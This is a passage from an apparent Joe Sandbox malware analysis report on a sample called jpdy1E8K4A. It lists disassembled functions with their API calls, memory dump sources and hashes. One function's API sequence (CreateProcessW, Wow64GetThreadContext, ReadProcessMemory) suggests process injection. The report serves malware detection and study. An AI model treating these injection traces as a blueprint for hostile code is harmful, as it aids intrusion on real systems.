                                                                                                • Instruction Fuzzy Hash: 16011D70784310BAF2305A68DD0BF5266546B45B24F20473ABBE5BE2D1D2F86885870C
                                                                                                Function 00414A46 Relevance: 3.0, APIs: 2, Instructions: 32COMMONLIBRARYCODE
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                  • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                                                                                                • __lock_file.LIBCMT ref: 00414A8D
                                                                                                  • Part of subcall function 00415471: __lock.LIBCMT ref: 00415496
                                                                                                • __fclose_nolock.LIBCMT ref: 00414A98
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                                                                • String ID:
                                                                                                • API String ID: 2800547568-0
                                                                                                • Opcode ID: a5ee4eb6f63f5c531cf15d6f0d52328148e0080a1a420ce895dcb566fcff73ac
                                                                                                • Instruction ID: d9443fdd3ee0a3059f5d17ec53abbfe2105cc8a5d10ddad395bff0ae1f283336
                                                                                                • Opcode Fuzzy Hash: a5ee4eb6f63f5c531cf15d6f0d52328148e0080a1a420ce895dcb566fcff73ac
                                                                                                • Instruction Fuzzy Hash: EEF0F6308417019AD710AB7588027EF37A09F41379F22864FA061961D1C73C85C29B5D
                                                                                                Function 00414FE2 Relevance: 3.0, APIs: 2, Instructions: 26COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • __lock_file.LIBCMT ref: 00415012
                                                                                                • __ftell_nolock.LIBCMT ref: 0041501F
                                                                                                  • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: __ftell_nolock__getptd_noexit__lock_file
                                                                                                • String ID:
                                                                                                • API String ID: 2999321469-0
                                                                                                • Opcode ID: 5d7fd30e9bb4e6974f03027405c635b91b5e55acacb14f372dcacdb3af77c648
                                                                                                • Instruction ID: e3e7bc223609ce985a1750c66bb322057640979a4505571362f253753ce4bf01
                                                                                                • Opcode Fuzzy Hash: 5d7fd30e9bb4e6974f03027405c635b91b5e55acacb14f372dcacdb3af77c648
                                                                                                • Instruction Fuzzy Hash: 64F03030900605EADB107FB5DD027EE3B70AF443A8F20825BB0259A0E1DB7C8AC29A59
                                                                                                Function 040D22A5 Relevance: 1.9, APIs: 1, Instructions: 400processthreadCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • CreateProcessW.KERNELBASE(?,00000000), ref: 040D2A63
                                                                                                • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 040D2AF9
                                                                                                • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 040D2B1B
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2152227056.00000000040D1000.00000040.00000020.00020000.00000000.sdmp, Offset: 040D1000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_40d1000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                                                • String ID:
                                                                                                • API String ID: 2438371351-0
                                                                                                • Opcode ID: d88754d343c0358fec48bb39518f6d050a5efe1528146ba10a354079ac39ca1d
                                                                                                • Instruction ID: aa091b1420d4ecc0bd9f93b51eb2c00771d4c616c0ae92529869d326b67813c9
                                                                                                • Opcode Fuzzy Hash: d88754d343c0358fec48bb39518f6d050a5efe1528146ba10a354079ac39ca1d
                                                                                                • Instruction Fuzzy Hash: 3512DD20E24658C6EB24DF64D8507DEB272EF68300F1090E9910DEB7A4E77A5F85CF5A
                                                                                                Function 00402F00 Relevance: 1.6, APIs: 1, Instructions: 104COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: _memmove
                                                                                                • String ID:
                                                                                                • API String ID: 4104443479-0
                                                                                                • Opcode ID: 224a1bccd0668171228bffd00b4e167e84225026459a60d9317a1c29c8a59c26
                                                                                                • Instruction ID: 6397ebbfaf442e519c955e074037b65107783079284990db5ef0c3dd021860ed
                                                                                                • Opcode Fuzzy Hash: 224a1bccd0668171228bffd00b4e167e84225026459a60d9317a1c29c8a59c26
                                                                                                • Instruction Fuzzy Hash: 36317371E00209EBDF009F52E9866AEFBF4FF40740F2189BED855E2650E7389990D759
                                                                                                Function 00402780 Relevance: 1.6, APIs: 1, Instructions: 101COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: _memmove
                                                                                                • String ID:
                                                                                                • API String ID: 4104443479-0
                                                                                                • Opcode ID: 8b2818c8434b9a070bb7a9b9dd55d4aa8d61190f7c46d4f62081b3e0e63eee4f
                                                                                                • Instruction ID: 412edbf2df7bf8c64f36b821a583ca4e96a0f18e0b9aed18a790d0e499aeb9a1
                                                                                                • Opcode Fuzzy Hash: 8b2818c8434b9a070bb7a9b9dd55d4aa8d61190f7c46d4f62081b3e0e63eee4f
                                                                                                • Instruction Fuzzy Hash: 60319CB9600A21EFC714DF19C580A62F7E0FF08310B14C57ADA89CB795E774E892CB99
                                                                                                Function 00410CFC Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: ProtectVirtual
                                                                                                • String ID:
                                                                                                • API String ID: 544645111-0
                                                                                                • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                • Instruction ID: 21b87f0337b3904faf2e49e7d89a80b8c5538d611ad57d97d778efbd48141229
                                                                                                • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                • Instruction Fuzzy Hash: 8131F770A00105DBC718DF88E590AAAF7B1FB49310B6486A6E409CF355DB78EDC1CBD9
                                                                                                Function 00408F40 Relevance: 1.6, APIs: 1, Instructions: 71COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: e5559574dc10eca8e97d8025a500eef8ee7d185e3c773571fee143e03780f234
                                                                                                • Instruction ID: 427b4a632c312742ac0951887501238d3178a51c37fde1d0fd35c98815df3d2a
                                                                                                • Opcode Fuzzy Hash: e5559574dc10eca8e97d8025a500eef8ee7d185e3c773571fee143e03780f234
                                                                                                • Instruction Fuzzy Hash: 21119674200201ABDB249F36D984E26B3A5AF45304B244D2FF9C5D7790DB7CE881DB5E
                                                                                                Function 0045E17D Relevance: 1.6, APIs: 1, Instructions: 60COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 35b7bc891c26268d2cb6d46035521dde4ecfc0337a7d2d2d45483da740e67eee
                                                                                                • Instruction ID: fe3c5e01fee558804f1d0cd68762aa03bf47037873853bda5dcd607d85013340
                                                                                                • Opcode Fuzzy Hash: 35b7bc891c26268d2cb6d46035521dde4ecfc0337a7d2d2d45483da740e67eee
                                                                                                • Instruction Fuzzy Hash: 2D118B352046019FDB10DF69D884E96B3E9AF8A314F14856EFD298B362CB35FC41CB95
                                                                                                Function 00414C76 Relevance: 1.5, APIs: 1, Instructions: 40COMMONLIBRARYCODE
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: __lock_file
                                                                                                • String ID:
                                                                                                • API String ID: 3031932315-0
                                                                                                • Opcode ID: 9d46abaf5bc0bef18357e8259ddf310e5220bee08d011669e2131a09b3543261
                                                                                                • Instruction ID: 324047821ed349453e17c5e7f52af34d31ade4ebcb64e32b23ce3c6ad3b356a0
                                                                                                • Opcode Fuzzy Hash: 9d46abaf5bc0bef18357e8259ddf310e5220bee08d011669e2131a09b3543261
                                                                                                • Instruction Fuzzy Hash: FF011E71801219EBCF21AFA5C8028DF7B71AF44764F11851BF824551A1E7398AE2DBD9
                                                                                                Function 00443E36 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • WriteFile.KERNELBASE(?,?,?,?,00000000,?,?,?,004263D0,?,00487ACC,00000003,0040DE90,?,?,00000001), ref: 00443E54
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: FileWrite
                                                                                                • String ID:
                                                                                                • API String ID: 3934441357-0
                                                                                                • Opcode ID: 873a582ac05df194872d3361efdc1b64d97226b1633050e8059638026df5ad0f
                                                                                                • Instruction ID: f8d6e32d6ecef3e6c51c5ea05c7ff41eb941b2b6d152ec47b845c679c5cedb0e
                                                                                                • Opcode Fuzzy Hash: 873a582ac05df194872d3361efdc1b64d97226b1633050e8059638026df5ad0f
                                                                                                • Instruction Fuzzy Hash: 6BE01276100318ABDB10DF98D844FDA77BCEF48765F10891AFA048B200C7B4EA908BE4
                                                                                                Function 004149C2 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: __wfsopen
                                                                                                • String ID:
                                                                                                • API String ID: 197181222-0
                                                                                                • Opcode ID: b5c1dd7f54315c70b952dff0fe33ec93e52da603c388fdf08d18a597afa050f6
                                                                                                • Instruction ID: b34ddb7a850719c89311ce964fc9f65e9e9400c6a390d5c1cbb008c3125e494a
                                                                                                • Opcode Fuzzy Hash: b5c1dd7f54315c70b952dff0fe33ec93e52da603c388fdf08d18a597afa050f6
                                                                                                • Instruction Fuzzy Hash: 82C092B244020C77CF112A93EC02F9A3F1E9BC0764F058021FB1C1A162AA77EAA19689
                                                                                                Function 0040DA20 Relevance: 1.3, APIs: 1, Instructions: 22COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • CloseHandle.KERNELBASE(?,?,00426FBF), ref: 0040DA3D
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: CloseHandle
                                                                                                • String ID:
                                                                                                • API String ID: 2962429428-0
                                                                                                • Opcode ID: 4893ac657bcef9b9334a0355bd28ce0f0291ef024a1c9f1561977d8c5be9d70a
                                                                                                • Instruction ID: 552ddd844a8bbede063c80161f66c4637379340f91e2bb70a518b226642b2913
                                                                                                • Opcode Fuzzy Hash: 4893ac657bcef9b9334a0355bd28ce0f0291ef024a1c9f1561977d8c5be9d70a
                                                                                                • Instruction Fuzzy Hash: B9E045B4A04B008BC6308F5BE444416FBF8EEE46203108E1FD4A6C2A64C3B4A1498F50
                                                                                                Function 040D32A8 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • Sleep.KERNELBASE(000001F4), ref: 040D32B9
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2152227056.00000000040D1000.00000040.00000020.00020000.00000000.sdmp, Offset: 040D1000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_40d1000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: Sleep
                                                                                                • String ID:
                                                                                                • API String ID: 3472027048-0
                                                                                                • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                                • Instruction ID: dd150269edc9e6657b406a42fcb9476284f126cc57e924a6364e4514ba75213d
                                                                                                • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                                • Instruction Fuzzy Hash: C6E0E67494020DDFDB00DFB4D5496AD7BB4EF04301F100561FD01E2280DA309D508A62

                                                                                                Non-executed Functions

                                                                                                Function 0047C81C Relevance: 74.2, APIs: 40, Strings: 2, Instructions: 674windowkeyboardCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0047C8E1
                                                                                                • DefDlgProcW.USER32(?,0000004E,?,?), ref: 0047C8FC
                                                                                                • GetKeyState.USER32(00000011), ref: 0047C92D
                                                                                                • GetKeyState.USER32(00000009), ref: 0047C936
                                                                                                • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0047C949
                                                                                                • GetKeyState.USER32(00000010), ref: 0047C953
                                                                                                • GetWindowLongW.USER32(00000002,000000F0), ref: 0047C967
                                                                                                • SendMessageW.USER32(00000002,0000110A,00000009,00000000), ref: 0047C993
                                                                                                • SendMessageW.USER32(00000002,0000113E,00000000,?), ref: 0047C9B6
                                                                                                • _wcsncpy.LIBCMT ref: 0047CA29
                                                                                                • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0047CA5A
                                                                                                • SendMessageW.USER32 ref: 0047CA7F
                                                                                                • InvalidateRect.USER32(?,00000000,00000001), ref: 0047CADF
                                                                                                • SendMessageW.USER32(?,00001030,?,0047EA68), ref: 0047CB84
                                                                                                • ImageList_SetDragCursorImage.COMCTL32(0099F230,00000000,00000000,00000000), ref: 0047CB9B
                                                                                                • ImageList_BeginDrag.COMCTL32(0099F230,00000000,000000F8,000000F0), ref: 0047CBAC
                                                                                                • SetCapture.USER32(?), ref: 0047CBB6
                                                                                                • ClientToScreen.USER32(?,?), ref: 0047CC17
                                                                                                • ImageList_DragEnter.COMCTL32(00000000,?,?,?,?), ref: 0047CC26
                                                                                                • ReleaseCapture.USER32 ref: 0047CC3A
                                                                                                • GetCursorPos.USER32(?), ref: 0047CC72
                                                                                                • ScreenToClient.USER32(?,?), ref: 0047CC80
                                                                                                • SendMessageW.USER32(?,00001012,00000000,?), ref: 0047CCE6
                                                                                                • SendMessageW.USER32 ref: 0047CD12
                                                                                                • SendMessageW.USER32(?,00001111,00000000,?), ref: 0047CD53
                                                                                                • SendMessageW.USER32 ref: 0047CD80
                                                                                                • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0047CD99
                                                                                                • SendMessageW.USER32(?,0000110B,00000009,?), ref: 0047CDAA
                                                                                                • GetCursorPos.USER32(?), ref: 0047CDC8
                                                                                                • ScreenToClient.USER32(?,?), ref: 0047CDD6
                                                                                                • GetParent.USER32(00000000), ref: 0047CDF7
                                                                                                • SendMessageW.USER32(?,00001012,00000000,?), ref: 0047CE60
                                                                                                • SendMessageW.USER32 ref: 0047CE93
                                                                                                • ClientToScreen.USER32(?,?), ref: 0047CEEE
                                                                                                • TrackPopupMenuEx.USER32(?,00000000,?,?,00951BD8,00000000,?,?,?,?), ref: 0047CF1C
                                                                                                • SendMessageW.USER32(?,00001111,00000000,?), ref: 0047CF46
                                                                                                • SendMessageW.USER32 ref: 0047CF6B
                                                                                                • ClientToScreen.USER32(?,?), ref: 0047CFB5
                                                                                                • TrackPopupMenuEx.USER32(?,00000080,?,?,00951BD8,00000000,?,?,?,?), ref: 0047CFE6
                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 0047D086
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: MessageSend$ClientScreen$Image$CursorDragList_State$CaptureLongMenuPopupTrackWindow$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                                                                                • String ID: @GUI_DRAGID$F
                                                                                                • API String ID: 3100379633-4164748364
                                                                                                • Opcode ID: 2b9e17ba3223fb7b4804536e302a42d427f78481ee09a8534aafb1e4469c1a6d
                                                                                                • Instruction ID: 980357f173c9be8e312ccaa606797ee7157b6525bda81ee0817efdfc4c954517
                                                                                                • Opcode Fuzzy Hash: 2b9e17ba3223fb7b4804536e302a42d427f78481ee09a8534aafb1e4469c1a6d
                                                                                                • Instruction Fuzzy Hash: F842AD706043419FD714DF28C884FABB7A5FF89700F14865EFA489B291C7B8E846CB5A
                                                                                                Function 00434418 Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 133keyboardthreadwindowCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetForegroundWindow.USER32 ref: 00434420
                                                                                                • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00434446
                                                                                                • IsIconic.USER32(?), ref: 0043444F
                                                                                                • ShowWindow.USER32(?,00000009), ref: 0043445C
                                                                                                • SetForegroundWindow.USER32(?), ref: 0043446A
                                                                                                • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00434481
                                                                                                • GetCurrentThreadId.KERNEL32 ref: 00434485
                                                                                                • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00434493
                                                                                                • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004344A2
                                                                                                • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004344A8
                                                                                                • AttachThreadInput.USER32(00000000,?,00000001), ref: 004344B1
                                                                                                • SetForegroundWindow.USER32(00000000), ref: 004344B7
                                                                                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 004344C6
